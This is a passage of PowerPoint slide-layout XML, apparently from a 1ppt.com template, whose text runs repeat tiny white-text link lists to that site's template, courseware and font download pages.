              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout31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31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31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31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32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32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32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32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32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32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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout32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32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32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32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33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33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33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33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33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33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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout33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33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33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33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34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34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34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34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34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34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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
